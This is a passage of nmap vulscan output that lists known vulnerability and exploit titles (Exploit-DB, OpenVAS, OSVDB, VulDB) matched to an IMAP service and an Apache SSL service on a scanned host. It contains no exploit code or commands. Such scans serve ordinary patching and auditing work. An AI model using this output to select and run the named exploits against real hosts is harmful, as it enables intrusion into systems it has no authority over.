11626| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
11627| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
11628| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
11629| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
11630| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
11631| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
11632| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
11633| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
11634| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
11635| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
11636| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
11637| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
11638| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
11639| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
11640| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
11641| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
11642| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
11643| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
11644| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
11645| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
11646| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
11647| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
11648| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
11649| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
11650| [340] Linux imapd Remote Overflow File Retrieve Exploit
11651|
11652| OpenVAS (Nessus) - http://www.openvas.org:
11653| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
11654| [901025] Dovecot Version Detection
11655| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
11656| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
11657| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
11658| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
11659| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
11660| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
11661| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
11662| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
11663| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
11664| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
11665| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
11666| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
11667| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
11668| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
11669| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
11670| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
11671| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
11672| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
11673| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
11674| [870607] RedHat Update for dovecot RHSA-2011:0600-01
11675| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
11676| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
11677| [870471] RedHat Update for dovecot RHSA-2011:1187-01
11678| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
11679| [870153] RedHat Update for dovecot RHSA-2008:0297-02
11680| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
11681| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
11682| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
11683| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
11684| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
11685| [863272] Fedora Update for dovecot FEDORA-2011-7612
11686| [863115] Fedora Update for dovecot FEDORA-2011-7258
11687| [861525] Fedora Update for dovecot FEDORA-2007-664
11688| [861394] Fedora Update for dovecot FEDORA-2007-493
11689| [861333] Fedora Update for dovecot FEDORA-2007-1485
11690| [860845] Fedora Update for dovecot FEDORA-2008-9202
11691| [860663] Fedora Update for dovecot FEDORA-2008-2475
11692| [860169] Fedora Update for dovecot FEDORA-2008-2464
11693| [860089] Fedora Update for dovecot FEDORA-2008-9232
11694| [840950] Ubuntu Update for dovecot USN-1295-1
11695| [840668] Ubuntu Update for dovecot USN-1143-1
11696| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
11697| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
11698| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
11699| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
11700| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
11701| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
11702| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
11703| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
11704| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
11705| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
11706| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
11707| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
11708| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
11709| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
11710| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
11711| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
11712| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
11713| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
11714| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
11715| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
11716| [70259] FreeBSD Ports: dovecot
11717| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
11718| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
11719| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
11720| [66522] FreeBSD Ports: dovecot
11721| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
11722| [66233] SLES10: Security update for Cyrus IMAPD
11723| [66226] SLES11: Security update for Cyrus IMAPD
11724| [66222] SLES9: Security update for Cyrus IMAPD
11725| [65938] SLES10: Security update for Cyrus IMAPD
11726| [65723] SLES11: Security update for Cyrus IMAPD
11727| [65523] SLES9: Security update for Cyrus IMAPD
11728| [65479] SLES9: Security update for cyrus-imapd
11729| [65094] SLES9: Security update for cyrus-imapd
11730| [65010] Ubuntu USN-838-1 (dovecot)
11731| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
11732| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
11733| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
11734| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
11735| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
11736| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
11737| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
11738| [64898] FreeBSD Ports: cyrus-imapd
11739| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
11740| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
11741| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
11742| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
11743| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
11744| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
11745| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
11746| [62854] FreeBSD Ports: dovecot-managesieve
11747| [61916] FreeBSD Ports: dovecot
11748| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
11749| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
11750| [60528] FreeBSD Ports: dovecot
11751| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
11752| [60089] FreeBSD Ports: dovecot
11753| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
11754| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
11755| [55807] Slackware Advisory SSA:2005-310-06 imapd
11756| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
11757| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
11758| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
11759| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
11760| [52297] FreeBSD Ports: cyrus-imapd
11761| [52296] FreeBSD Ports: cyrus-imapd
11762| [52295] FreeBSD Ports: cyrus-imapd
11763| [52294] FreeBSD Ports: cyrus-imapd
11764| [52172] FreeBSD Ports: cyrus-imapd
11765|
11766| SecurityTracker - https://www.securitytracker.com:
11767| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
11768| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
11769| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
11770| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
11771|
11772| OSVDB - http://www.osvdb.org:
11773| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
11774| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
11775| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
11776| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
11777| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
11778| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
11779| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
11780| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
11781| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
11782| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
11783| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
11784| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
11785| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
11786| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
11787| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
11788| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
11789| [66113] Dovecot Mail Root Directory Creation Permission Weakness
11790| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
11791| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
11792| [66110] Dovecot Multiple Unspecified Buffer Overflows
11793| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
11794| [64783] Dovecot E-mail Message Header Unspecified DoS
11795| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
11796| [62796] Dovecot mbox Format Email Header Handling DoS
11797| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
11798| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
11799| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
11800| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
11801| [52906] UW-imapd c-client Initial Request Remote Format String
11802| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
11803| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
11804| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
11805| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
11806| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
11807| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
11808| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
11809| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
11810| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
11811| [43137] Dovecot mail_extra_groups Symlink File Manipulation
11812| [42979] Dovecot passdbs Argument Injection Authentication Bypass
11813| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
11814| [39876] Dovecot LDAP Auth Cache Security Bypass
11815| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
11816| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
11817| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
11818| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
11819| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
11820| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
11821| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
11822| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
11823| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
11824| [23281] Dovecot imap/pop3-login dovecot-auth DoS
11825| [23280] Dovecot Malformed APPEND Command DoS
11826| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
11827| [13242] UW-imapd CRAM-MD5 Authentication Bypass
11828| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
11829| [12042] UoW imapd Multiple Unspecified Overflows
11830| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
11831| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
11832| [911] UoW imapd AUTHENTICATE Command Remote Overflow
11833| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
11834| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
11835|_
11836443/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
11837|_http-server-header: Apache/2
11838| vulscan: VulDB - https://vuldb.com:
11839| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
11840| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
11841| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
11842| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
11843| [134416] Apache Sanselan 0.97-incubator Loop denial of service
11844| [134415] Apache Sanselan 0.97-incubator Hang denial of service
11845| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
11846| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
11847| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11848| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11849| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
11850| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
11851| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
11852| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
11853| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
11854| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
11855| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
11856| [133750] Oracle Agile Recipe Management for Pharmaceuticals 9.3.3/9.3.4 Apache Commons FileUpload unknown vulnerability
11857| [133728] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
11858| [133644] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
11859| [133643] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache HTTP Server denial of service
11860| [133640] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Commons FileUpload unknown vulnerability
11861| [133638] Oracle Healthcare Master Person Index 3.0/4.0 Apache Commons FileUpload unknown vulnerability
11862| [133614] Oracle Data Integrator 12.2.1.3.0 Apache Batik unknown vulnerability
11863| [133594] Oracle WebCenter Portal 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
11864| [133591] Oracle JDeveloper 11.1.1.9.0/12.1.3.0.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11865| [133590] Oracle Identity Analytics 11.1.1.5.8 Apache Commons FileUpload unknown vulnerability
11866| [133588] Oracle Endeca Information Discovery Integrator 3.2.0 Apache Commons FileUpload unknown vulnerability
11867| [133587] Oracle Data Integrator 11.1.1.9.0 Apache Groovy unknown vulnerability
11868| [133585] Oracle API Gateway 11.1.2.4.0 Apache Commons FileUpload unknown vulnerability
11869| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
11870| [133571] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache Commons FileUpload unknown vulnerability
11871| [133522] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache Tomcat unknown vulnerability
11872| [133520] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache HTTP Server denial of service
11873| [133518] Oracle Primavera Unifier up to 18.8 Apache Commons FileUpload unknown vulnerability
11874| [133508] Oracle Communications Instant Messaging Server 10.0.1 Apache Tomcat unknown vulnerability
11875| [133501] Oracle Communications Policy Management 12.1/12.2/12.3/12.4 Apache Struts 1 unknown vulnerability
11876| [133500] Oracle Communications Application Session Controller 3.7.1/3.8.0 Apache Tomcat unknown vulnerability
11877| [133493] Oracle Communications Pricing Design Center 11.1/12.0 Apache Log4j unknown vulnerability
11878| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
11879| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
11880| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
11881| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
11882| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
11883| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
11884| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
11885| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
11886| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
11887| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
11888| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
11889| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
11890| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
11891| [131859] Apache Hadoop up to 2.9.1 privilege escalation
11892| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
11893| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
11894| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
11895| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
11896| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
11897| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
11898| [130629] Apache Guacamole Cookie Flag weak encryption
11899| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
11900| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
11901| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
11902| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
11903| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
11904| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
11905| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
11906| [130123] Apache Airflow up to 1.8.2 information disclosure
11907| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
11908| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
11909| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
11910| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
11911| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11912| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11913| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11914| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
11915| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
11916| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
11917| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
11918| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
11919| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
11920| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
11921| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
11922| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
11923| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
11924| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
11925| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11926| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
11927| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11928| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
11929| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
11930| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
11931| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
11932| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
11933| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
11934| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
11935| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
11936| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
11937| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
11938| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
11939| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
11940| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
11941| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
11942| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
11943| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
11944| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
11945| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
11946| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
11947| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
11948| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
11949| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
11950| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
11951| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
11952| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
11953| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
11954| [127007] Apache Spark Request Code Execution
11955| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
11956| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
11957| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
11958| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
11959| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
11960| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
11961| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
11962| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
11963| [126346] Apache Tomcat Path privilege escalation
11964| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
11965| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
11966| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
11967| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
11968| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
11969| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
11970| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
11971| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
11972| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
11973| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
11974| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
11975| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11976| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
11977| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
11978| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
11979| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
11980| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
11981| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
11982| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
11983| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
11984| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
11985| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
11986| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
11987| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
11988| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
11989| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
11990| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
11991| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
11992| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
11993| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
11994| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
11995| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
11996| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
11997| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
11998| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
11999| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
12000| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
12001| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
12002| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
